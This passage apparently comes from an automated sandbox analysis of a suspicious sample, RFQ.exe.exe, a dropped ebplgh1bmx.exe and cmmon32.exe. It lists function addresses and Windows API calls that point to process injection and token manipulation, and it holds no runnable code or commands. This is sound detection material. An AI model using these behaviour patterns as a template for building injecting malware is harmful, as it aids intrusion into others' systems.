          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA360 NtAllocateVirtualMemory,LdrInitializeThunk,29_2_019DA360
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA2D0 NtClose,LdrInitializeThunk,29_2_019DA2D0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA240 NtReadFile,LdrInitializeThunk,29_2_019DA240
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA5F0 NtReadVirtualMemory,LdrInitializeThunk,29_2_019DA5F0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA540 NtDelayExecution,LdrInitializeThunk,29_2_019DA540
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA560 NtQuerySystemInformation,LdrInitializeThunk,29_2_019DA560
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA480 NtMapViewOfSection,LdrInitializeThunk,29_2_019DA480
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA4A0 NtUnmapViewOfSection,LdrInitializeThunk,29_2_019DA4A0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA410 NtQueryInformationToken,LdrInitializeThunk,29_2_019DA410
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA700 NtProtectVirtualMemory,LdrInitializeThunk,29_2_019DA700
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA720 NtResumeThread,LdrInitializeThunk,29_2_019DA720
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA750 NtCreateFile,LdrInitializeThunk,29_2_019DA750
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA6A0 NtCreateSection,LdrInitializeThunk,29_2_019DA6A0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA610 NtAdjustPrivilegesToken,LdrInitializeThunk,29_2_019DA610
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DB0B0 NtGetContextThread,29_2_019DB0B0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA800 NtSetValueKey,29_2_019DA800
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA3D0 NtCreateKey,29_2_019DA3D0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA310 NtEnumerateValueKey,29_2_019DA310
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA350 NtQueryValueKey,29_2_019DA350
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA370 NtQueryInformationProcess,29_2_019DA370
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA2F0 NtQueryInformationFile,29_2_019DA2F0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DBA30 NtSetContextThread,29_2_019DBA30
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA220 NtWaitForSingleObject,29_2_019DA220
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA260 NtWriteFile,29_2_019DA260
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA5A0 NtWriteVirtualMemory,29_2_019DA5A0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA520 NtEnumerateKey,29_2_019DA520
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DBD40 NtSuspendThread,29_2_019DBD40
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DACE0 NtCreateMutant,29_2_019DACE0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DB410 NtOpenProcessToken,29_2_019DB410
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA430 NtQueryVirtualMemory,29_2_019DA430
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DB470 NtOpenThread,29_2_019DB470
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA470 NtSetInformationFile,29_2_019DA470
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA460 NtOpenProcess,29_2_019DA460
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA780 NtOpenDirectoryObject,29_2_019DA780
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA710 NtQuerySection,29_2_019DA710
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA6D0 NtCreateProcessEx,29_2_019DA6D0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA650 NtQueueApcThread,29_2_019DA650
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_00419830 NtCreateFile,29_2_00419830
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_004198E0 NtReadFile,29_2_004198E0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_00419960 NtClose,29_2_00419960
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_00419A10 NtAllocateVirtualMemory,29_2_00419A10
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_00419A0B NtAllocateVirtualMemory,29_2_00419A0B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456ACE0 NtCreateMutant,LdrInitializeThunk,30_2_0456ACE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A560 NtQuerySystemInformation,LdrInitializeThunk,30_2_0456A560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A610 NtAdjustPrivilegesToken,LdrInitializeThunk,30_2_0456A610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A2D0 NtClose,LdrInitializeThunk,30_2_0456A2D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A360 NtAllocateVirtualMemory,LdrInitializeThunk,30_2_0456A360
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A3E0 NtFreeVirtualMemory,LdrInitializeThunk,30_2_0456A3E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A470 NtSetInformationFile,30_2_0456A470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456B470 NtOpenThread,30_2_0456B470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A460 NtOpenProcess,30_2_0456A460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A410 NtQueryInformationToken,30_2_0456A410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456B410 NtOpenProcessToken,30_2_0456B410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A430 NtQueryVirtualMemory,30_2_0456A430
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A480 NtMapViewOfSection,30_2_0456A480
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A4A0 NtUnmapViewOfSection,30_2_0456A4A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456BD40 NtSuspendThread,30_2_0456BD40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A540 NtDelayExecution,30_2_0456A540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A520 NtEnumerateKey,30_2_0456A520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A5F0 NtReadVirtualMemory,30_2_0456A5F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A5A0 NtWriteVirtualMemory,30_2_0456A5A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A650 NtQueueApcThread,30_2_0456A650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A6D0 NtCreateProcessEx,30_2_0456A6D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A6A0 NtCreateSection,30_2_0456A6A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A750 NtCreateFile,30_2_0456A750
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A710 NtQuerySection,30_2_0456A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A700 NtProtectVirtualMemory,30_2_0456A700
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A720 NtResumeThread,30_2_0456A720
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A780 NtOpenDirectoryObject,30_2_0456A780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A800 NtSetValueKey,30_2_0456A800
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456B0B0 NtGetContextThread,30_2_0456B0B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A240 NtReadFile,30_2_0456A240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A260 NtWriteFile,30_2_0456A260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456BA30 NtSetContextThread,30_2_0456BA30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A220 NtWaitForSingleObject,30_2_0456A220
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A2F0 NtQueryInformationFile,30_2_0456A2F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A350 NtQueryValueKey,30_2_0456A350
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A370 NtQueryInformationProcess,30_2_0456A370
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A310 NtEnumerateValueKey,30_2_0456A310
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_0456A3D0 NtCreateKey,30_2_0456A3D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_02569A10 NtAllocateVirtualMemory,30_2_02569A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_02569830 NtCreateFile,30_2_02569830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_025698E0 NtReadFile,30_2_025698E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_02569960 NtClose,30_2_02569960
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 30_2_02569A0B NtAllocateVirtualMemory,30_2_02569A0B
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E36685: CreateFileW,DeviceIoControl,CloseHandle,6_2_00E36685
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E2ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00E2ACC5
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00E379D3
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E2410F6_2_00E2410F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E102A46_2_00E102A4
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E2038E6_2_00E2038E
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DFE3B06_2_00DFE3B0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E106D96_2_00E106D9
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E2467F6_2_00E2467F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E5AACE6_2_00E5AACE
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E24BEF6_2_00E24BEF
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E1CCC16_2_00E1CCC1
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DFAF506_2_00DFAF50
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF6F076_2_00DF6F07
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E1B0436_2_00E1B043
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E1D1B96_2_00E1D1B9
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E531BC6_2_00E531BC
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E0B11F6_2_00E0B11F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E2724D6_2_00E2724D
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E1123A6_2_00E1123A
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E032006_2_00E03200
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E313CA6_2_00E313CA
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF93F06_2_00DF93F0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E0F5636_2_00E0F563
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF96C06_2_00DF96C0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E3B6CC6_2_00E3B6CC
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E5F7FF6_2_00E5F7FF
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF77B06_2_00DF77B0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E279C96_2_00E279C9
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E0FA576_2_00E0FA57
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E03B706_2_00E03B70
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF9B606_2_00DF9B60
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF7D196_2_00DF7D19
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E19ED06_2_00E19ED0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E0FE6F6_2_00E0FE6F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00DF7FA36_2_00DF7FA3
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0152594B8_2_0152594B
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015271108_2_01527110
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B61DF8_2_015B61DF
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C19E28_2_015C19E2
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015261808_2_01526180
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015CD9BE8_2_015CD9BE
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015210708_2_01521070
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015BD0168_2_015BD016
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0152E0208_2_0152E020
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015200218_2_01520021
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015248CB8_2_015248CB
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C28E88_2_015C28E8
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0150A0808_2_0150A080
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015A18B68_2_015A18B6
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0151FB408_2_0151FB40
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015263C28_2_015263C2
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_014FEBE08_2_014FEBE0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_01524B968_2_01524B96
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_01524A5B8_2_01524A5B
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015CE2148_2_015CE214
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B0A028_2_015B0A02
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0152523D8_2_0152523D
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C22DD8_2_015C22DD
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C1A998_2_015C1A99
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015142B08_2_015142B0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_014F0D408_2_014F0D40
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B1D1B8_2_015B1D1B
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C25198_2_015C2519
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015115308_2_01511530
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0159C53F8_2_0159C53F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015AFDDB8_2_015AFDDB
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015BD5D28_2_015BD5D2
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015A1DE38_2_015A1DE3
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0159E58A8_2_0159E58A
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015BE5818_2_015BE581
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0152547E8_2_0152547E
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015114108_2_01511410
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0150740C8_2_0150740C
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015AF42B8_2_015AF42B
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015BDCC58_2_015BDCC5
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B44EF8_2_015B44EF
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C1C9F8_2_015C1C9F
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C2C9A8_2_015C2C9A
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B34908_2_015B3490
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C17468_2_015C1746
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C1FCE8_2_015C1FCE
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015157908_2_01515790
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B27828_2_015B2782
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015176408_2_01517640
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_01525E708_2_01525E70
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_01524E618_2_01524E61
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015BCE668_2_015BCE66
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015266118_2_01526611
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015C26F88_2_015C26F8
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_015B3E968_2_015B3E96
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_004010308_2_00401030
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00402D878_2_00402D87
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00402D908_2_00402D90
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00409F5C8_2_00409F5C
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00409F608_2_00409F60
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0041D71E8_2_0041D71E
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0041DF2B8_2_0041DF2B
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00402FB08_2_00402FB0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A6D9BE29_2_01A6D9BE
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C618029_2_019C6180
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A619E229_2_01A619E2
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A561DF29_2_01A561DF
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C711029_2_019C7110
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019E990629_2_019E9906
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C594B29_2_019C594B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A418B629_2_01A418B6
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019AA08029_2_019AA080
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A628E829_2_01A628E8
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C48CB29_2_019C48CB
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C981029_2_019C9810
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5D01629_2_01A5D016
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019CE02029_2_019CE020
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C002129_2_019C0021
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C107029_2_019C1070
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C4B9629_2_019C4B96
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C63C229_2_019C63C2
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_0199EBE029_2_0199EBE0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019BFB4029_2_019BFB40
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019B42B029_2_019B42B0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A61A9929_2_01A61A99
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A622DD29_2_01A622DD
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C523D29_2_019C523D
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A50A0229_2_01A50A02
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A6E21429_2_01A6E214
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C4A5B29_2_019C4A5B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5E58129_2_01A5E581
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A3E58A29_2_01A3E58A
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A41DE329_2_01A41DE3
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5D5D229_2_01A5D5D2
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A4FDDB29_2_01A4FDDB
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A3C53F29_2_01A3C53F
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019B153029_2_019B1530
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A51D1B29_2_01A51D1B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A6251929_2_01A62519
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01990D4029_2_01990D40
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5349029_2_01A53490
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A61C9F29_2_01A61C9F
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A62C9A29_2_01A62C9A
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A544EF29_2_01A544EF
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5DCC529_2_01A5DCC5
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019B141029_2_019B1410
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A4F42B29_2_01A4F42B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019A740C29_2_019A740C
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C547E29_2_019C547E
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019B579029_2_019B5790
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5278229_2_01A52782
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A61FCE29_2_01A61FCE
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A6174629_2_01A61746
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A53E9629_2_01A53E96
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A626F829_2_01A626F8
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C661129_2_019C6611
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_01A5CE6629_2_01A5CE66
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019B764029_2_019B7640
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019C5E7029_2_019C5E70
          Source: C:\Program Files (x86)\W